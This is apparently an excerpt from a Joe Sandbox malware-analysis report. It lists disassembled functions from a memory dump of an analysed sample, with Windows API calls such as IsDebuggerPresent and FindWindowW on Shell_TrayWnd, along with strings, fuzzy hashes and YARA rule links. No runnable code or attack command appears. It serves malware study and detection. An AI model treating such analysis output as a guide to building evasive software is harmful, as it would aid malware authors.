                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: 45ae9058248e24c33088497a333de374a6190caee534680cdd6c392c82b01113
                                                                      • Instruction ID: ed1eca9dce1e28ddb9774bf08332387d02701c810f574cb53a6a2ddea82fc94c
                                                                      • Opcode Fuzzy Hash: 45ae9058248e24c33088497a333de374a6190caee534680cdd6c392c82b01113
                                                                      • Instruction Fuzzy Hash: C701D471A4110EABDB14EBE0C95AEFE7BB8BF55300F10011AB801632D1DE205E48D6B1
                                                                      Function 00568D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00568DEE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: 16d6d4f4eaf8a2b43c3ca7a2c504652fe0baab6707eea487c70dfb8cce180231
                                                                      • Instruction ID: c14d7ee557ab011ba1b3c9c7e3b6d4b4d4095465680b555a19d56f1a3c628dfd
                                                                      • Opcode Fuzzy Hash: 16d6d4f4eaf8a2b43c3ca7a2c504652fe0baab6707eea487c70dfb8cce180231
                                                                      • Instruction Fuzzy Hash: F801A2B1A4110EABDB11EAE4C94AEFE7FBCBF55300F14051AB905B32D2DE254E48D672
                                                                      Function 0056C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 0056C534
                                                                        • Part of subcall function 0056C816: _memmove.LIBCMT ref: 0056C860
                                                                        • Part of subcall function 0056C816: VariantInit.OLEAUT32(00000000), ref: 0056C882
                                                                        • Part of subcall function 0056C816: VariantCopy.OLEAUT32(00000000,?), ref: 0056C88C
                                                                      • VariantClear.OLEAUT32(?), ref: 0056C556
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Init$ClearCopy_memmove
                                                                      • String ID: d}\
                                                                      • API String ID: 2932060187-1221828746
                                                                      • Opcode ID: 37bad20083f5c1cbcacf6a0db946b143d4dcf0d209c7331e80fef34b169b7bbd
                                                                      • Instruction ID: 344eb60a79675dad089c4a964a26052a28fbf1c204b87045522f5ad5fcf1f394
                                                                      • Opcode Fuzzy Hash: 37bad20083f5c1cbcacf6a0db946b143d4dcf0d209c7331e80fef34b169b7bbd
                                                                      • Instruction Fuzzy Hash: 2F1100719007099FC710DF99D88499AFBF8FF18310B50866FE58AD7611D771AA49CF90
                                                                      Function 00574F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp
                                                                      • String ID: #32770
                                                                      • API String ID: 2292705959-463685578
                                                                      • Opcode ID: 8d825ebcba772db193f0ec316656abcdcae4b8abdbd8326062589f42d733ed0b
                                                                      • Instruction ID: 73ae47a529f9d7024ecfefe93819c99c61881a8371c4f2565edf17db9b2b87d6
                                                                      • Opcode Fuzzy Hash: 8d825ebcba772db193f0ec316656abcdcae4b8abdbd8326062589f42d733ed0b
                                                                      • Instruction Fuzzy Hash: D9E0D8326002292BD7209B99AC49FB7FBACFB95B70F01006BFD04D3151EA609A558BE1
                                                                      Function 0054B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0054B314: _memset.LIBCMT ref: 0054B321
                                                                        • Part of subcall function 00530940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0054B2F0,?,?,?,0051100A), ref: 00530945
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 0054B2F4
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 0054B303
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0054B2FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3158253471-631824599
                                                                      • Opcode ID: 74124b862e6d2d5e8e443b84413f93f97c788cf2465f18f0434e7eb3c6abe6b2
                                                                      • Instruction ID: bbbae6d1705dc3003f92ed982c27b974a4eaef1d1766a94eed1c9f3cce9fdd30
                                                                      • Opcode Fuzzy Hash: 74124b862e6d2d5e8e443b84413f93f97c788cf2465f18f0434e7eb3c6abe6b2
                                                                      • Instruction Fuzzy Hash: 69E06D742007118BE720DF2AD8083867FE8BF14348F018D2EE446C7240E7B4E448CBB1
                                                                      Function 00551935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00551775
                                                                        • Part of subcall function 0058BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0055195E,?), ref: 0058BFFE
                                                                        • Part of subcall function 0058BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C010
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0055196D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                      • String ID: WIN_XPe
                                                                      • API String ID: 582185067-3257408948
                                                                      • Opcode ID: 46f663777a07377538ce81f287b52ee40d0147fbae6aadca0858cba897a020f8
                                                                      • Instruction ID: edd937c0b2616eafacd39f30a7882fe27a00b5a9e466b97d285dbce46c237ff2
                                                                      • Opcode Fuzzy Hash: 46f663777a07377538ce81f287b52ee40d0147fbae6aadca0858cba897a020f8
                                                                      • Instruction Fuzzy Hash: 0DF01570810009EBDB15DB98C998BECBFB8BB18302F140497E502A20A1CB314E88EF64
                                                                      Function 00595964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0059596E
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00595981
                                                                        • Part of subcall function 00575244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 685e70f8548c6d38cd4f70042f3fbf45aed7ca2dfecdbab1edd3b852feaff203
                                                                      • Instruction ID: d8ee39f9b2561cb0394ce673a7d8feec47f0d7ebe53635d9e398638d3a46b761
                                                                      • Opcode Fuzzy Hash: 685e70f8548c6d38cd4f70042f3fbf45aed7ca2dfecdbab1edd3b852feaff203
                                                                      • Instruction Fuzzy Hash: 03D0C935784311BBE664AB70AC0FFA76A14BB50B50F02082AB24AEA1D1D9E0A804D754
                                                                      Function 00595998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005959AE
                                                                      • PostMessageW.USER32(00000000), ref: 005959B5
                                                                        • Part of subcall function 00575244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 3d1661921dcc809ef8bf15a272e0794a5fb2f808a41f611cb4d8fc165714b1b1
                                                                      • Instruction ID: 07c148d799e31f56ee7008cc14e99304a8d17e599ae83d7c6a57dad18b630751
                                                                      • Opcode Fuzzy Hash: 3d1661921dcc809ef8bf15a272e0794a5fb2f808a41f611cb4d8fc165714b1b1
                                                                      • Instruction Fuzzy Hash: 15D0C9317803117BE664AB70AC0FF976A14BB54B50F02082AB24AEA1D1D9E0A804D754